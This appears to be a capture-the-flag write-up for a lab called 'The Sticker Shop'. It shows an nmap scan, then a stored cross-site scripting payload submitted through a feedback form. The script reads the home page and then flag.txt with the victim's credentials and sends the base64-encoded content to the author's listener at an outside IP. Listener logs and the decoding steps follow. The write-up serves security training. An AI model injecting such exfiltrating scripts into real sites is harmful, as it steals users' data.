The Sticker Shop
The Sticker Shop
Embedded Files
The Sticker Shop is an easy difficulty challenge
Skill Learned: XSS
┌──(glmx㉿kali)-[~]
└─$ nmap -sC -sV 10.10.27.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 02:00 WIB
Nmap scan report for 10.10.27.7
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
|_ 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
8080/tcp open http-proxy Werkzeug/3.0.1 Python/3.8.10
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: Tue, 31 Dec 2024 19:00:43 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
.....
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 8081
[sudo] password for glmx:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
Craft & submit to Feedback Page:
<script>
fetch("/", {method:'GET',mode:'no-cors',credentials:'same-origin'})
.then(response => response.text())
.then(text => {
fetch('http://10.2.10.193:8081/' + btoa(text), {mode:'no-cors'});
});
</script>
after submit, get response:
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 8081
[sudo] password for glmx:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.27.7 - - [01/Jan/2025 02:09:18] code 404, message File not found
10.10.27.7 - - [01/Jan/2025 02:09:18] "GET /PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD....
....
...
...
iAgICA8YnI+Jm5ic3A7Jm5ic3A7V2Ugb25seSBzZWxsIHN0aWNrZXJzIGF0IG91ciBwaHlzaWNhbCBzdG9yZS4gUGxlYXNlIGZlZWwgZnJlZSB0byBzdG9wIGJ5IQo8L2JvZHk+CjwvaHRtbD4= HTTP/1.1" 404 -
┌──(glmx㉿kali)-[~]
└─$ echo "PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD....lIGZlZWwgZnJlZSB0byBzdG9wIGJ5IQo8L2JvZHk+CjwvaHRtbD4=" | base64 -d
...
...
<!DOCTYPE html>
<html>
<head>
<title>Cat Sticker Shop</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
}
header {
background-color: #333;
color: #fff;
text-align: center;
padding: 10px;
}
....
....
<ul>
<li><a href="/">Home</a></li>
<li><a href="/submit_feedback">Feedback</a></li>
</ul>
</header>
<div class="content">
<h1>Welcome to the Cat Sticker Shop!</h1>
<div class="product">
<img src="/static/images/cat_sticker_1.png" alt="Cat Sticker 1" width="300" height="300">
<h2>Cat Sticker 1</h2>
<p>Price: $2.99</p>
</div>
<div class="product">
<img src="/static/images/cat_sticker_2.png" alt="Cat Sticker 2" width="300" height="300">
<h2>Cat Sticker 2</h2>
<p>Price: $3.99</p>
</div>
</div>
<br> We only sell stickers at our physical store. Please feel free to stop by!
</body>
</html>
Ubah untuk tujuan lebih spesifik yaitu ke mengarah ke flag.txt dan submit kembali:
<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
.then(response => response.text())
.then(text => {
fetch('http://10.2.10.193:4444/' + btoa(text), {mode:'no-cors'});
});
</script>
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.10.27.7 - - [01/Jan/2025 02:17:43] code 404, message File not found
10.10.27.7 - - [01/Jan/2025 02:17:43] "GET /VEhNezgzN......jIzMDVlZTZ9 HTTP/1.1" 404 -
┌──(glmx㉿kali)-[~]
└─$ echo "VEhNezgzN......jIzMDVlZTZ9" | base64 -d
THM{8.....6}
Google Sites
Report abuse